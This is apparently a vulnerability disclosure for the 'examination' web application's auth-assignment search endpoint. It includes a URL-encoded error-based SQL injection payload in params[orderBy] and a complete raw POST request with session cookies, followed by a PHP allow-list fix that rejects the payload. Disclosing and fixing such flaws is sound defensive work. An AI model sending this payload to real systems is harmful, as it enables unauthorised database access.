examination
admin/admin/auth-assignment/search has a SQL injection vulnerability
Vulnerability Product: examination
Vulnerability type: SQL injection
Vulnerability Details: admin/admin/auth-assignment/search
PoC: params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281446970635%29%29%29
POST /admin/admin/auth-assignment/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 555
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/auth-assignment/index
X-Csrf-Token: 0nNavAQMO5OSOv5UKzFPV5ZBGRiQEzi45ig6yqwsnlPgKhvmdk5azPxotSccciAc1AhPedt7aumQaXucnXPLIw==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_2=false&bRegex_3=false&bSearchable_0=true&bSearchable_1=true&bSearchable_2=true&bSearchable_3=true&bSortable_0=false&bSortable_1=false&bSortable_2=true&bSortable_3=false&iColumns=4&iDisplayLength=10&iDisplayStart=0&iSortingCols=0&mDataProp_0=user_id&mDataProp_1=item_name&mDataProp_2=created_at&mDataProp_3=&params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281446970635%29%29%29&params%5Buser_id%5D%5B%5D=1&sColumns=%2C%2C%2C&sEcho=2&sSearch=&sSearch_0=&sSearch_1=&sSearch_2=&sSearch_3=
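
The fix for this class of bug is to stop treating params[orderBy] as a SQL fragment and accept only known column names with an optional direction. The following is an added example, not code from the examination project: buildOrderBy and SORTABLE_COLUMNS are hypothetical names, and the column list is assumed from the mDataProp_* fields in the request above.

```php
<?php
declare(strict_types=1);

// Columns the grid may sort by. Taken from the mDataProp_* fields in the
// request above; the real table may expose more (assumption).
const SORTABLE_COLUMNS = ['user_id', 'item_name', 'created_at'];

/**
 * Turn an untrusted orderBy value into a safe ORDER BY fragment.
 * Accepts "col", "col asc", "col desc", comma separated. Anything else
 * (function calls, parentheses, unknown columns) is rejected outright.
 * Hypothetical helper, not part of the examination code base.
 */
function buildOrderBy(string $raw, array $allowed = SORTABLE_COLUMNS): string
{
    $parts = [];
    foreach (explode(',', $raw) as $term) {
        // One identifier plus an optional direction, nothing more.
        if (!preg_match('/^\s*([A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?\s*$/i', $term, $m)) {
            throw new InvalidArgumentException('orderBy: malformed sort term');
        }
        if (!in_array($m[1], $allowed, true)) {
            throw new InvalidArgumentException('orderBy: column not sortable');
        }
        $dir = strtoupper($m[2] ?? 'ASC');
        // Only an allow-listed identifier reaches the SQL text, and it is quoted.
        $parts[] = '`' . $m[1] . '` ' . $dir;
    }
    return implode(', ', $parts);
}

// Constructed sample inputs: two legitimate sorts and the decoded PoC value.
$samples = [
    'created_at desc',
    'user_id, item_name asc',
    'extractvalue(1,concat(char(126),md5(1446970635)))',
];
foreach ($samples as $s) {
    try {
        echo buildOrderBy($s), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The two legitimate values produce quoted ORDER BY fragments; the PoC value fails on its first term and never reaches the database.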
